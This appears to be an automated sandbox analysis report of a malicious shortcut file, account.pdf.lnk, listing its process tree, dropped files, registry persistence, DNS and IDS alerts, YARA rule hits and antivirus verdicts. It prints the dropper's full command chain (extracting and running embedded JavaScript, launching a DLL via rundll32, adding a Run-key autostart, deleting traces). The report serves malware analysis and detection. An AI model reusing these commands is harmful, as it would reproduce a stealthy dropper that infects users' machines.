Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 8, 2023, 2:35 p.m. | Sept. 8, 2023, 2:37 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "dwgenGeAk" C:\Users\test22\AppData\Local\Temp\account.pdf.lnk
2564-
cmd.exe "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls
2676-
cmd.exe C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk
2768 -
findstr.exe findstr /b "var onm=" "C:\Users\test22\AppData\Local\Temp\account.pdf.lnk"
2824 -
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "C:\Users\test22\AppData\Local\Temp\account.pdf"
1152-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef445f1e8,0x7fef445f1f8,0x7fef445f208
2108 -
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=940 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
2188
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y
3016 -
-
cmd.exe cmd /c start rundll32.exe MSADOCG.DLL,DllUnregisterServer
2548
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js
2808
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
login.drive-google-com.tk | 103.108.67.191 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Application Cache\Index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Top Sites |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Preferences |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Policy\User Policy |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\89764e1f-463b-4e96-846c-9ed5d71183c2.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Application Cache\Cache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Managed Mode Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\verified_contents.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\README |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-wal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\1152-1694151328140625.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\verified_contents.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Visited Links |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\File System\primary.origin |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-64FAD828-480.pma |
file | C:\Users\test22\AppData\Local\Temp\account.pdf |
file | C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
file | C:\Users\test22\AppData\Local\Temp\MSADOCG.DLL |
file | C:\Users\test22\AppData\Local\Temp\*.lnk |
file | C:\Users\test22\AppData\Local\Temp\account.pdf.lnk |
cmdline | C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
cmdline | "C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf |
cmdline | "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y |
cmdline | "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls |
cmdline | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
file | C:\Users\test22\AppData\Local\Temp\MSADOCG.DLL |
url | https://crashpad.chromium.org/bug/new |
url | https://crashpad.chromium.org/ |
url | http://dts.search-results.com/sr?lng= |
url | http://creativecommons.org/ns |
url | https://qc.search.yahoo.com/search?ei= |
url | http://crbug.com/122474. |
url | https://search.yahoo.com/search?ei= |
url | http://crbug.com/31395. |
url | https://support.google.com/chrome/answer/165139 |
url | https://ct.googleapis.com/aviator/ |
url | https://ct.startssl.com/ |
url | https://suggest.yandex.com.tr/suggest-ff.cgi?part= |
url | https://drive-daily-5.corp.google.com/ |
url | https://github.com/GoogleChrome/Lighthouse/issues |
url | http://www.searchnu.com/favicon.ico |
url | https://support.google.com/installer/?product= |
url | https://www.najdi.si/search.jsp?q= |
url | https://accounts.google.com/ServiceLogin |
url | https://accounts.google.com/OAuthLogin |
url | https://search.goo.ne.jp/sgt.jsp?MT= |
url | https://www.google.com/tools/feedback/chrome/__submit |
url | https://suggest.yandex.by/suggest-ff.cgi?part= |
url | http://feed.snap.do/?q= |
url | https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico |
url | http://developer.chrome.com/apps/declare_permissions.html |
url | https://ct.googleapis.com/rocketeer/ |
url | https://se.search.yahoo.com/search?ei= |
url | https://developers.google.com/web/fundamentals/accessibility/accessible-styles |
url | https://mammoth.ct.comodo.com/ |
url | http://hladaj.atlas.sk/fulltext/?phrase= |
url | http://buscador.softonic.com/?q= |
url | https://hk.search.yahoo.com/sugg/chrome?output=fxjson |
url | https://ph.search.yahoo.com/sugg/chrome?output=fxjson |
url | https://ro.search.yahoo.com/favicon.ico |
url | https://kvasir.no/grafikk/favicon.ico |
url | https://codereview.chromium.org/25305002). |
url | https://ve.search.yahoo.com/sugg/chrome?output=fxjson |
url | http://search.conduit.com/Results.aspx?q= |
url | https://ct.googleapis.com/logs/argon2018/ |
url | https://developers.google.com/web/tools/lighthouse/ |
url | https://support.google.com/chrome/answer/185277 |
url | https://nz.search.yahoo.com/sugg/chrome?output=fxjson |
url | https://github.com/bgrins/spectrum |
url | http://crbug.com/642141 |
url | http://code.google.com/p/chromium/issues/entry |
url | https://www.google.com/favicon.ico |
url | https://suggest.yandex.kz/suggest-ff.cgi?part= |
url | https://www.yandex.kz/chrome/newtab |
url | http://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager07.htmlhttp://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager02.htmlhttp://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager06.htmlhttps://support.google.com/chrome/answer/118142065782681https://support.google.com/chrome/?p=settings_clear_browsing_datahttps://history.google.com/history/?utm_source=chrome_cbdhttps://myactivity.google.com/myactivity/?utm_source=chrome_nhttps://myactivity.google.com/myactivity/?utm_source=chrome_hChrome |
url | http://dev.w3.org/csswg/css3-transitions/ |
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Client_SW_User_Data_Stealer | rule | Client_SW_User_Data_Stealer | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | browser info stealer | rule | infoStealer_browser_Zero | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Possibly employs anti-virtualization techniques | rule | vmdetect | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Google Chrome User Data Check | rule | Chrome_User_Data_Check_Zero | ||||||
description | Install itself for autorun at Windows startup | rule | Persistence | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Create a windows service | rule | Create_Service |
cmdline | C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk |
cmdline | cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
cmdline | "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls |
cmdline | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE | reg_value | cmd /c start C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
file | C:\Users\test22\AppData\Local\Temp\account.pdf |
parent_process | cscript.exe | martian_process | cmd /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y | ||||||
parent_process | cscript.exe | martian_process | cmd /c start C:\Users\test22\AppData\Local\Temp\account.pdf | ||||||
parent_process | cscript.exe | martian_process | cmd /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat | ||||||
parent_process | cscript.exe | martian_process | cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef445f1e8,0x7fef445f1f8,0x7fef445f208 | ||||||
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1252,1068463943848656389,9381778915884664680,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=815552CDE72A5D7590704E1C828ACECF --mojo-platform-channel-handle=1268 --ignored=" --type=renderer " /prefetch:2 | ||||||
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=940 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 | ||||||
parent_process | cscript.exe | martian_process | cmd /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y | ||||||
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js | ||||||
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat | ||||||
parent_process | cscript.exe | martian_process | cmd /c start C:\Users\test22\AppData\Local\Temp\account.pdf | ||||||
parent_process | cscript.exe | martian_process | cmd /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat | ||||||
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf | ||||||
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y | ||||||
parent_process | cscript.exe | martian_process | cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
url | http://127.0.0.1 |
MicroWorld-eScan | Trojan.LNK.Droid.2.Gen |
FireEye | Trojan.LNK.Droid.2.Gen |
Arcabit | Trojan.LNK.Droid.2.Gen [many] |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Trojan.LNK.Droid.2.Gen |
Emsisoft | Trojan.LNK.Droid.2.Gen (B) |
F-Secure | Trojan-Dropper:W32/Janicab.A |
VIPRE | Trojan.LNK.Droid.2.Gen |
TrendMicro | HEUR_LNKEXEC.A |
McAfee-GW-Edition | BehavesLike.Trojan.dl |
Sophos | Mal/LnkDrop-A |
Microsoft | Trojan:Script/Sabsik.FL.A!ml |
ZoneAlarm | HEUR:Trojan.WinLNK.Agent.gen |
GData | Trojan.LNK.Droid.2.Gen |
Detected | |
VBA32 | Trojan.Link.Crafted |
ALYac | GT:JS.Backdoor.2.0B1CE076 |
MAX | malware (ai score=88) |
Zoner | Probably Heur.LNKScript |
SentinelOne | Static AI - Suspicious LNK |
Panda | Trj/Ghostcript.A |